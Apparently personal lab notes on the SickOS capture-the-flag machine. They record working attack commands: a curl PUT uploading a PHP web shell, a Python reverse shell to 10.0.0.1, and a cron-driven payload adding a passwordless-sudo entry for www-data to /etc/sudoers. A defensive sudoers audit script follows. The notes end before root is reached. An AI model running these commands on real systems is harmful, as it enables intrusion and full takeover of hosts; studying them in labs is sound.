SickOS
Nmap
https://stackoverflow.com/questions/9120760/curl-simple-file-upload-417-expectation-failed
Web shell (uploaded with PUT):
curl -v -X PUT -d '<?php system($_GET["cmd"]); ?>' http://192.168.1.7/test/shell.php
Wfuzz:
wfuzz -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hc 404 -u 192.168.1.7/FUZZ
One way to go from browser to terminal: reverse shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Focus on:
1. pwd
2. etc
3. tmp
Go and check tmp (nothing interesting)
So go back
Go and check etc
ls -la /etc/cron*
Used for job scheduling
Go to tmp
$ echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update
$ cat update
chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers
$ ls -la
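Defender's check for the sudoers change in the step above, as an added example that is not part of the original notes: it flags active NOPASSWD rules for service accounts and a sudoers file whose mode is looser than 0440. The SERVICE_ACCOUNTS list, the function names and the sample file are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original notes): audit a sudoers-format file.
# SERVICE_ACCOUNTS is an assumption; list the accounts your services run as.
SERVICE_ACCOUNTS="www-data apache nginx nobody"

# Print "LINE:ACCOUNT" for each active rule giving a service account NOPASSWD.
# Comment and blank lines are skipped; backslash continuations are not joined.
find_nopasswd_grants() {
    awk -v accounts="$SERVICE_ACCOUNTS" '
        BEGIN { n = split(accounts, a, " "); for (i = 1; i <= n; i++) svc[a[i]] = 1 }
        /^[ \t]*#/ || /^[ \t]*$/ { next }
        ($1 in svc) && /NOPASSWD[ \t]*:/ { print NR ":" $1 }
    ' "$1"
}

# True when the file has any write bit or is world-readable (looser than 0440).
mode_is_loose() {
    [ -n "$(find "$1" -prune \( -perm -0200 -o -perm -0020 -o -perm -0002 -o -perm -0004 \))" ]
}

# Report both findings; return 1 if either is present, 0 if the file is clean.
audit_sudoers() {
    rc=0
    grants=$(find_nopasswd_grants "$1")
    [ -z "$grants" ] || { echo "NOPASSWD for service account (line:account): $grants"; rc=1; }
    if mode_is_loose "$1"; then echo "mode looser than 0440: $1"; rc=1; fi
    return "$rc"
}

# Constructed sample: default-looking rules plus the entry written in the notes.
write_sample() {
    cat > "$1" <<'EOF'
# constructed sample, not a real host's sudoers
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
# www-data ALL=NOPASSWD: ALL
www-data ALL=NOPASSWD: ALL
EOF
}

# Stand-alone run: audit the file given as $1, or else the constructed sample.
if [ -n "${1:-}" ]; then
    audit_sudoers "$1"
else
    demo=$(mktemp) && write_sample "$demo" && chmod 440 "$demo"
    audit_sudoers "$demo" || true
    rm -f "$demo"
fi
```

Because the command in the notes restores mode 440 after appending, the mode check alone would miss it; the rule scan is what catches the added line.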
Move to root directory: